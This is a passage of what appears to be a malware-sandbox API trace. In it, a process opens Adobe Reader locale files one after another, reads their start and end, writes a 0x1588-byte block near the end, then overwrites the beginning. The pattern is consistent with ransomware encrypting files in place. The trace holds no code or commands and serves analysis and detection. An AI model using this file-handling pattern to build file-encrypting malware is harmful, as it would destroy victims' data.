lpBuffer=0x2882db8*, lpNumberOfBytesWritten=0x331f28c*=0xf000, lpOverlapped=0x0) returned 1 [0079.776] WriteFile (in: hFile=0x1f0, lpBuffer=0x2882db8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesWritten=0x331f28c*=0x1000, lpOverlapped=0x0) returned 1 [0079.776] CloseHandle (hObject=0x1f0) returned 1 [0079.776] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\Spelling.DAN" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\da_dk\\spelling.dan"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0079.777] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0079.777] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x2800 [0079.777] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0079.777] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0079.778] ReleaseMutex (hMutex=0x168) returned 1 [0079.778] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Spelling.DAN", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.778] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Spelling.DAN", cchWideChar=12, lpMultiByteStr=0x1f7352c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Spelling.DAN", lpUsedDefaultChar=0x0) returned 12 [0079.778] ReadFile (in: hFile=0x1f0, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0079.791] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x1800 [0079.791] ReadFile (in: hFile=0x1f0, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0079.792] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x1800 [0079.792] WriteFile (in: hFile=0x1f0, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0079.793] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0079.793] WriteFile (in: hFile=0x1f0, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x331f28c*=0x1000, lpOverlapped=0x0) returned 1 [0079.793] CloseHandle (hObject=0x1f0) returned 1 [0079.793] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\de_DE\\Checkers.DEU" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\de_de\\checkers.deu"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0079.794] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0079.794] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x1fe00 [0079.794] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0079.795] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0079.795] ReleaseMutex (hMutex=0x168) returned 1 [0079.795] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Checkers.DEU", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.795] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Checkers.DEU", cchWideChar=12, lpMultiByteStr=0x1f7356c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Checkers.DEU", lpUsedDefaultChar=0x0) returned 12 [0079.795] ReadFile (in: hFile=0x1f0, lpBuffer=0x2691bb8, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x2691bb8*, lpNumberOfBytesRead=0x331f278*=0x4000, lpOverlapped=0x0) returned 1 [0079.797] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x1ee00 [0079.797] ReadFile (in: hFile=0x1f0, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0081.041] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x1ee00 [0081.041] WriteFile (in: hFile=0x1f0, lpBuffer=0x26698c8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x26698c8*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0081.042] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0081.042] WriteFile (in: hFile=0x1f0, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x331f28c*=0x4000, lpOverlapped=0x0) returned 1 [0081.042] CloseHandle (hObject=0x1f0) returned 1 [0081.043] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\de_DE\\pddom.DEU" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\de_de\\pddom.deu"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0081.043] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0081.043] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x2c00 [0081.044] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0081.044] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0081.044] ReleaseMutex (hMutex=0x168) returned 1 [0081.044] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="pddom.DEU", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0081.044] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="pddom.DEU", cchWideChar=9, lpMultiByteStr=0x1f735ec, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pddom.DEU", lpUsedDefaultChar=0x0) returned 9 [0081.044] ReadFile (in: hFile=0x1f0, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0081.049] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x1c00 [0081.049] ReadFile (in: hFile=0x1f0, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0081.059] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x1c00 [0081.060] WriteFile (in: hFile=0x1f0, lpBuffer=0x26698c8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x26698c8*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0081.093] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0081.093] WriteFile (in: hFile=0x1f0, lpBuffer=0x2867a58*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesWritten=0x331f28c*=0x1000, lpOverlapped=0x0) returned 1 [0081.093] CloseHandle (hObject=0x1f0) returned 1 [0081.094] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\de_DE\\Services\\DEXShare.asfx" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\de_de\\services\\dexshare.asfx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0081.094] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0081.094] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x95b0 [0081.095] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0081.095] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0081.095] ReleaseMutex (hMutex=0x168) returned 1 [0081.095] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DEXShare.asfx", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0081.095] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DEXShare.asfx", cchWideChar=13, lpMultiByteStr=0x1f7356c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DEXShare.asfx", lpUsedDefaultChar=0x0) returned 13 [0081.095] ReadFile (in: hFile=0x1f0, lpBuffer=0x25a1648, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x25a1648*, lpNumberOfBytesRead=0x331f278*=0x4000, lpOverlapped=0x0) returned 1 [0081.107] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x85b0 [0081.107] ReadFile (in: hFile=0x1f0, lpBuffer=0x2663838, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x2663838*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0081.110] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x85b0 [0081.111] WriteFile (in: hFile=0x1f0, lpBuffer=0x26698c8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x26698c8*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0081.111] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0081.111] WriteFile (in: hFile=0x1f0, lpBuffer=0x25a5678*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a5678*, lpNumberOfBytesWritten=0x331f28c*=0x4000, lpOverlapped=0x0) returned 1 [0081.111] CloseHandle (hObject=0x1f0) returned 1 [0081.112] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\es_ES\\Annots.ESP" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\es_es\\annots.esp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0081.112] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0081.112] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x7ec00 [0081.112] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0081.112] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0081.113] ReleaseMutex (hMutex=0x168) returned 1 [0081.113] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Annots.ESP", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0081.113] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Annots.ESP", cchWideChar=10, lpMultiByteStr=0x1f732cc, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Annots.ESP", lpUsedDefaultChar=0x0) returned 10 [0081.113] ReadFile (in: hFile=0x1f0, lpBuffer=0x25a1648, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x25a1648*, lpNumberOfBytesRead=0x331f278*=0x8000, lpOverlapped=0x0) returned 1 [0081.184] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x7dc00 [0081.184] ReadFile (in: hFile=0x1f0, lpBuffer=0x2694e18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x2694e18*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0081.187] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x7dc00 [0081.187] WriteFile (in: hFile=0x1f0, lpBuffer=0x2694e18*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2694e18*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0081.189] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0081.189] WriteFile (in: hFile=0x1f0, lpBuffer=0x286cf58*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesWritten=0x331f28c*=0x8000, lpOverlapped=0x0) returned 1 [0081.189] CloseHandle (hObject=0x1f0) returned 1 [0081.193] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\es_ES\\makeaccessible.ESP" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\es_es\\makeaccessible.esp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0081.193] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0081.193] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x14600 [0081.193] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0081.193] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0081.193] ReleaseMutex (hMutex=0x168) returned 1 [0081.194] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="makeaccessible.ESP", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0081.194] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="makeaccessible.ESP", cchWideChar=18, lpMultiByteStr=0x1f88a64, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="makeaccessible.ESP", lpUsedDefaultChar=0x0) returned 18 [0081.194] ReadFile (in: hFile=0x1f0, lpBuffer=0x1ea3958, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea3958*, lpNumberOfBytesRead=0x331f278*=0x4000, lpOverlapped=0x0) returned 1 [0081.384] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x13600 [0081.385] ReadFile (in: hFile=0x1f0, lpBuffer=0x26698c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x26698c8*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0081.394] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x13600 [0081.394] WriteFile (in: hFile=0x1f0, lpBuffer=0x26698c8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x26698c8*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0081.395] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0081.395] WriteFile (in: hFile=0x1f0, lpBuffer=0x25a4048*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a4048*, lpNumberOfBytesWritten=0x331f28c*=0x4000, lpOverlapped=0x0) returned 1 [0081.395] CloseHandle (hObject=0x1f0) returned 1 [0081.395] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\es_ES\\Search.ESP" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\es_es\\search.esp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0081.396] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0081.396] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x6000 [0081.397] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0081.397] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0081.397] ReleaseMutex (hMutex=0x168) returned 1 [0081.397] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Search.ESP", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0081.397] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Search.ESP", cchWideChar=10, lpMultiByteStr=0x1f735ec, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Search.ESP", lpUsedDefaultChar=0x0) returned 10 [0081.397] ReadFile (in: hFile=0x1f0, lpBuffer=0x26698c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x26698c8*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0081.425] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x5000 [0081.425] ReadFile (in: hFile=0x1f0, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0081.437] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x5000 [0081.437] WriteFile (in: hFile=0x1f0, lpBuffer=0x286ec88*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x286ec88*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0081.438] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0081.438] WriteFile (in: hFile=0x1f0, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x331f28c*=0x1000, lpOverlapped=0x0) returned 1 [0081.438] CloseHandle (hObject=0x1f0) returned 1 [0081.438] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\Acroform.EUQ" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\eu_es\\acroform.euq"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0081.439] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0081.439] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x66c00 [0081.439] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0081.439] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0081.439] ReleaseMutex (hMutex=0x168) returned 1 [0081.439] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Acroform.EUQ", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0081.440] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Acroform.EUQ", cchWideChar=12, lpMultiByteStr=0x1f7320c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Acroform.EUQ", lpUsedDefaultChar=0x0) returned 12 [0081.440] ReadFile (in: hFile=0x1f0, lpBuffer=0x25a0018, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x331f278*=0x8000, lpOverlapped=0x0) returned 1 [0081.459] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x65c00 [0081.459] ReadFile (in: hFile=0x1f0, lpBuffer=0x2867358, 